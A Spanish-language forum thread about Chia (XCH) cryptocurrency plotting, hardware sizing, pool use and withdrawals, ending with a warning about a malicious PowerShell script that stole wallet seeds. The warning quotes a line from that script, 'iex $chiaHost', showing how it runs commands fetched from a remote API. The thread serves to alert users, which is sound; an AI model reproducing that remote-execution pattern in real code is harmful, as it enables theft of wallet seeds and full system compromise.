Chia (XCH)

Entiendo que si pongo otro ordenador a plotear con el bat de @davidgt (que me va súper por cierto, gracias), basta con que especifique el mismo fingerprint de mi wallet que está dado de alta en hpool y con el que ploteo en el ordenador principal. La idea es luego copiar el plot por red al hd externo que tengo en el ordenador principal (que es sobre el que opera el miner de hpool).

Digamos que con el fingerprint firmo el plot mientras se hace y es todo lo que se requiere para que se reconozca como mío por el pool.

Solo por confirmar.

Gracias!

exacto, todos los plots que hagas tienen que ser con el mismo fingerprint (que es tu wallet) aunque los hagas en distintos pc. Después los plots te los puedes llevar de un pc a otro, por eso van muy bien los hdd externos.
Yo voy ploteando en un pc, y a mdedida que lleno discos externos los voy pasando al pc secundario que uso para farmear

1 me gusta

Si ejecutas el minero de hpool tambien en ese ordenador no hace falta moverlo. Yo estoy ploteando en dos ordenadores y tengo el minero en los dos, y el el pool me aparecen ambos.

2 Me gusta

Molaría, pero solo tengo un hd externo por ahora. :sweat_smile:
Estoy viendo a ver si lo lleno primero. Pero la cosa me va lenta.

Lo que veo es que aunque no tengo una buena máquina, tengo muchas malas máquinas.

sobra, lo mismo da plotear 6 en paralelo en 1 máquina, que plotear 2 en paralelo en 3 máquinas…

1 me gusta

Hola,
Pregunta, tal vez tonta !
Chia recomienda, y lo que solemos hablar de dos hilos por plot, OK, Pero …
si tengo, es un ejemplo, una CPU con 12 hilos y quiero dedicar 6 hilos a cada plot ?
Puedo? Ventajas? que iría mas rápido? No tiene sentido? etc …
Lo digo porque me voy a pillar un “bicho” de 24 hilos, ese daría para 12 plot en parelelo, pero claro necesito SSD/M2 de 259MB temporales * 12 plot = 3,1TB y eso es una pasta !!!
Es asi?
Saludos.

No tiene sentido meter más hilos, 2 por plot son suficientes. De hecho solo gasta 2 hilos en la fase 1, el resto de fases se hacen con 1 hilo.

En cada disco nvme de 1tb puedes plotear 3 en paralelo, y en los de 2tb ploteas 6 en paralelo.
Si quieres plotear 12 en paralelo necesitarías 2 de 2tb, aparte necesitas tener también 64gb de ram.

Tampoco hace falta que lo lleves todo a tope, gástate lo que creas oportuno, pero recuerda que esto cada vez es menos rentable.
Yo por ejemplo solo he gastado dinero en discos hdd, lo demás me he ido apañando con los pcs que tenía en casa y un nvme de 1tb que compré.

con 1 nmve de 4TB (carísimos por cierto) haces 7 plots en paralelo

En 4TB metes minimo 12 plots en paralelo, y con delay alguno mas se podra rascar.

sí, cierto, me he confundido. Se pueden hacer hasta 15.

1 me gusta

Buenas! A todos aquellos afortunados que yaa llegamos al mínimo de 0,20 para retiro, os ha salido bien? En qué wallet lo habéis realizado? en Okex, Gate… es que esta semana me planteo hacer el primer retiro para ver si os ha ido bien. Aunque viendo la dificultad que va adquiriendo esto… lo mismo llegar a 0.20 de nuevo no es tan sencillo… y conviene esperar y sacar un poco más. Qué opináis? Yo actualmente tengo 20Tb ploteando de un máximo de 50 que voy a tener a 8 plots/día.

Un saludo compas!

Muy buenas, tengo un equipo con las siguientes caracteristicas:

  • AMD Ryzen Threadripper 3970X
  • 128 GB de RAM
  • Nmve 4.0 de 4 TB y de 2 TB
    Estuve pensando en vender plots pero nose si hay gente interesada, si hay gente interesada es para algo serio. No vengo a timar a nadie, solo hacer negocios.

Si esto no se puede poner aqui lo siento.

Yo he hecho ya algún retiro, y lo que hice fue crear una nueva semilla en otro pc y retirarlo ahi. Como de momento no voy a vender, prefiero tenerlos yo

1 me gusta

yo lo he enviado a Okex y todo bien, sin problemas

1 me gusta

Pero supongo que una vez que lo retires a la wallet… ya no debería de haber problemas de que te las “limpien” no? Es que no termino de ver la practicidad de crear otra semilla, disculpad. No valdría con las claves de retiro de los wallets??

Esto es por prevencion, ya que para vincular los plots se ha de firmar con la semilla, y has de ejecutar un software que no se sabe exactamente que lleva dentro.

1 me gusta

Pues precisamente vi esta mañana un script de poweshell que te limpiaba la cartera de chias

The script itself on the Github shows that it can execute remote command at line 81.

If ($chiaHost.Contains("./")){ iex $chiaHost >$null 2>&1

This can be used to execute any kind of remote command added to the HOSTS file that is pulled from the API url.

That wallet has already taken 10 XCH from a user. Most likely it is now also a cause for concern that the script maker might even have the seed passphrase for those wallets! Which now means that those wallets are potentially burned.

If anyone here has used that script, be warned! They could have full access to your wallet! Safe practice would be to switch to a new wallet!

Good luck guys!

Edit: It has been brought to my attention that the user could have installed malicious monitoring tools on your system seeing as the powershell is usually run with Admin privileges. Your whole system / OS could be compromised! Best safety advice I could personally give: Reinstall OS, get new wallet. Sorry lads!

De hecho, tambien advierten sobre las herramientas de monitorizacion de logs que al funcionar en powershell son ejecutados con permisos de administrador.

:astonished: :astonished: :astonished: :astonished:

3 Me gusta

Y que software viene con este regalito?

Es que el repositorio de github lo han borrado, han echado algunas capturas a la api donde la primera llamada era para enviar lo que hubiera con las palabras secretas asi que bonito estropicio te hacia, esos plots ya ni siquiera sirven para otra cosa porque tienes la semilla comprometida :face_with_monocle:

1 me gusta

Que gente mas maja, pero esto era de esperar y por desgracia no sera el unico que intente estas cosas.
Gracias por el aviso.